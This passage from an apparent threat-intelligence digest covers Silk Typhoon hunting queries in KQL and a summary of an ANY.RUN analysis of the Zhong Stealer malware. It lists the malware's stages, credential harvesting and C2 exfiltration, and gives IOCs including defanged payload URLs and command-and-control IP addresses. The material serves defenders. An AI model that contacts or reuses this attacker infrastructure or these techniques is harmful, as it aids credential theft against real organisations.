Hunting methods

  • Microsoft Sentinel:
    • Use the TI Mapping analytics to automatically match malicious domain indicators with workspace data. Install the Threat Intelligence solution from the Microsoft Sentinel Content Hub if not deployed.
    • Utilize the following queries to detect behavior associated with Silk Typhoon:
      • Anomalous password reset
      • Privileged logon from new ASN
      • Anomalous account creation
      • Web shell activity
      • Potential web shell
      • Sign-in password spray
      • Smart lockouts
      • Credential dumping tools file artifacts
      • NTDS theft
      • Time series keyvault access anomaly
      • Keyvault mass secret retrieval
      • Suspicious sign-in by AADConnect account
      • New service principal running queries
      • SharePoint downloads by IP
      • Anomaly of MailItem access by GraphAPI
    • Use the following query to detect vulnerabilities exploited by Silk Typhoon: 
      DeviceTvmSoftwareVulnerabilities
| where CveId in ("CVE-2025-0282")
| project DeviceId,DeviceName,OSPlatform,OSVersion,SoftwareVendor,SoftwareName,SoftwareVersion,
CveId,VulnerabilitySeverityLevel
| join kind=inner (
DeviceTvmSoftwareVulnerabilitiesKB
| project CveId, CvssScore,IsExploitAvailable,VulnerabilitySeverityLevel,PublishedDate,VulnerabilityDescription,AffectedSoftware
) on CveId
| project DeviceId,DeviceName,OSPlatform,OSVersion,SoftwareVendor,SoftwareName,SoftwareVersion,
CveId,VulnerabilitySeverityLevel,CvssScore,IsExploitAvailable,PublishedDate,VulnerabilityDescription,AffectedSoftware
    • Use the following query for enumeration of Users & Groups for Lateral Movement: 
      DeviceProcessEvents
| where FileName == 'net.exe' and AccountName != "" and ProcessCommandLine !contains '\\' and ProcessCommandLine !contains '/add'
| where (ProcessCommandLine contains ' user ' or ProcessCommandLine contains ' group ') and (ProcessCommandLine contains ' /do' or ProcessCommandLine contains ' /domain')
| extend Target = extract("(?i)[user|group] (\"*[a-zA-Z0-9-_ ]+\"*)", 1, ProcessCommandLine)
| filter Target != ''
| project AccountName, Target, ProcessCommandLine, DeviceName, TimeGenerated
| sort by AccountName, Target
  • Microsoft Defender XDR: Refer to the list of applicable detections for Silk Typhoon activity and related threats in Microsoft Defender for Endpoint, Microsoft Defender for Identity, Microsoft Defender XDR, Microsoft Defender for Cloud, and Microsoft Defender for Cloud Apps. Examples include “Silk Typhoon activity group”, “Suspicious Interactive Logon to the Entra Connect Server”, and “Unusual addition of credentials to an OAuth app”.
  • Microsoft Defender Vulnerability Management: Surfaces devices affected by vulnerabilities like CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065.
  • Microsoft Defender External Attack Surface Management: Attack Surface Insights can indicate vulnerable devices related to CVE-2024-3400, CVE-2023-3519, and ProxyLogon (Microsoft Exchange Server vulnerabilities). Note that “[Potential]” insights require further verification.
  • Microsoft Security Copilot: Customers with provisioned access can use Microsoft Security Copilot to investigate and respond to incidents and hunt for threats using relevant threat intelligence. Pre-built promptbooks are available for incident investigation, user analysis, threat actor profile, threat intelligence reports, and vulnerability impact assessment.

Original link: https://www.microsoft.com/en-us/security/blog/2025/03/05/silk-typhoon-targeting-it-supply-chain/

Zhong Stealer: Technical Analysis of a Threat Targeting FIntech

Summary

This article from December 20 to 24, 2024, details a newly discovered stealer malware named Zhong Stealer, which targeted the cryptocurrency and fintech sectors through a phishing campaign. The attackers impersonated customers on chat support platforms like Zendesk, using social engineering tactics with broken Chinese language and suspicious ZIP file attachments containing malware to trick support agents into downloading and executing the malicious files. The analysis, conducted using ANY.RUN, covers the malware’s execution flow, data exfiltration to a C2 server in Hong Kong, and persistence mechanisms involving registry key modifications and scheduled tasks. The article highlights the initial lack of specific detections by antivirus solutions and emphasizes the importance of proactive behavioral analysis for identifying such threats. The malware uses multiple stages, including downloading additional components disguised as legitimate software, and employs common but effective TTPs like disabling event logging, establishing persistence via registry keys and scheduled tasks, harvesting credentials, and communicating over non-standard ports. The naming of the malware, Zhong Stealer, was inspired by the email address of the initial submitter. The article concludes with recommendations for organizations to protect themselves against this type of threat.

Technical Details

The attack begins with social engineering via chat support platforms where attackers create new, empty accounts and initiate support tickets using broken Chinese language. They attach ZIP files containing what appear to be screenshots or additional details, named with Simplified Chinese characters, such as “图片_20241224 (2).zip”, “Android 自由截图_20241220.zip”, and “Android – Screenshots2024122288jpg.zip”. These ZIP files contain executable (EXE) files named similarly, some in Simplified and others in Traditional Chinese, such as “图片_20241224.exe” and “圖片2024122288jpg.exe”.

Upon execution, the initial stage of Zhong Stealer contacts a Command and Control (C2) server located in Hong Kong, hosted by Alibaba Cloud. The malware first downloads a TXT file acting as an inventory, containing links to other malicious components: “down.exe”, “TASLogin.log”, and “TASLoginBase.dll”.

The “down.exe” file is notable as it is signed with a revoked digital certificate from Morning Leap & Cazo Electronics Technology Co., likely stolen, and masquerades as a BitDefender Security updater. This is an example of Defense Evasion (T1036.005 - Masquerading).

Once executed, “down.exe” creates a BAT file with a random 4-digit name in the user’s temporary folder (e.g., “4948.bat”). This script uses system utilities like Conhost.exe and Attrib.exe to unhide and grant execution permissions to subsequent stages, demonstrating Command and Scripting Interpreter: Windows Command Shell (T1059.003).

The malware then queries the system’s supported languages, possibly as a form of System Information Discovery (T1082) to avoid targeting specific regions, a behavior also seen in ransomware. It also establishes Persistence (TA0003) by creating a scheduled task using Task Scheduler (T1053), serving as a fallback mechanism.

Zhong Stealer proceeds with Defense Evasion: Disable or Modify Tools (T1562) by disabling trace logs. It then performs System Information Discovery (T1082), reading various registry keys to gather details such as the machine hostname, GUID, proxies, software policies, and supported languages. It also evaluates Internet Explorer/Edge security settings.

The final stage of the malware achieves primary Persistence (T1547.001) by adding a registry key at HKEY_CURRENT_USER\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN.

Next, Zhong Stealer focuses on Credential Access (TA0006) by Harvesting Credentials (T1552) and browser extension data from browsers like Brave and Edge/Internet Explorer. This involves accessing local application data folders related to these browsers.

Finally, the malware communicates with its C2 server at IP address 156.245.23.188 on the non-standard port 1131 using TCP to Exfiltrate Data (TA0010). The use of a Non-Standard Port (T1571) is a common tactic to evade basic network monitoring.

The MITRE ATT&CK Matrix highlights the following techniques employed by Zhong Stealer:

  • T1562: Disable or Modify Tools (Disabling Event Logging)
  • T1547: Boot or Logon Autostart Execution (Registry Run Keys / Startup Folder)
  • T1552: Credentials in Files
  • T1053: Scheduled Task/Job
  • T1571: Non-Standard Port
  • T1059.003: Command and Scripting Interpreter: Windows Command Shell
  • T1082: System Information Discovery

Countries

Hong Kong (as the location of the C2 server). The article does not explicitly state targeted countries beyond the general targeting of cryptocurrency and fintech sectors, which are global.

Industries

Cryptocurrency Fintech

Recommendations

  • Train customer support teams to recognize phishing tactics and avoid opening suspicious file attachments in support chats.
  • Restrict ZIP file execution from unverified sources and enforce zero-trust security policies to prevent unauthorized file access.
  • Monitor outbound network traffic for suspicious C2 connections, especially to non-standard ports like 1131.
  • Use ANY.RUN’s real-time analysis to safely detonate unknown executables, observe their behavior step by step, and extract critical IOCs before the malware can spread.
  • Adopt proactive detection and analysis strategies beyond traditional antivirus solutions.

Hunting methods

The article mentions using ANY.RUN’s Interactive Sandbox for malware analysis and threat tracking. It also refers to ANY.RUN’s threat intelligence products like TI Lookup, YARA Search, and Feeds for finding IOCs. However, no specific Yara, Sigma, KQL, SPL, or other hunting queries are provided directly in the article. Security teams can leverage the identified TTPs and IOCs to develop their own hunting rules.

IOC

File Hashes (MD5):
778b6521dd2b07d7db0eaeaab9a2f86b

File Hashes (SHA1):
ce120e922ed4156dbd07de8335c5a632974ec527

File Hashes (SHA256):
02244934046333f45bc22abe6185e6ddda033342836062afb681a583aa7d827f
1abffe97aafe9916b366da57458a78338598cab9742c2d9e03e4ad0ba11f29bf
4eaebd93e23be3427d4c1349d64bef4b5fc455c93aebb9b5b752981e9266488e
dd44dabff536a1aa9b845dd891ad483162d4f28913344c93e5d59f648a186098
e46779869c6797b294cb097f47027a5c52466fd11112b6ccd52c569578d4b8cd
5f422be165e4b6557f45719914f724a4fe1840fa792ecc739861bfdba45c1550

URLs:
hxxps://kkuu.oss-cn-hongkong.aliyuncs[.]com/ss/TASLogin.log
hxxps://kkuu.oss-cn-hongkong.aliyuncs[.]com/ss/TASLoginBase.dll
hxxps://kkuu.oss-cn-hongkong.aliyuncs[.]com/ss/down.exe
hxxps://kkuu.oss-cn-hongkong.aliyuncs[.]com/ss/uu.txt

Hostname: kkuu.oss-cn-hongkong.aliyuncs[.]com

IPv4 Addresses: 156.245.23.188
47.79.64.228

Port: 1131 (C2 communication port)

Original link: https://any.run/cybersecurity-blog/zhong-stealer-malware-analysis/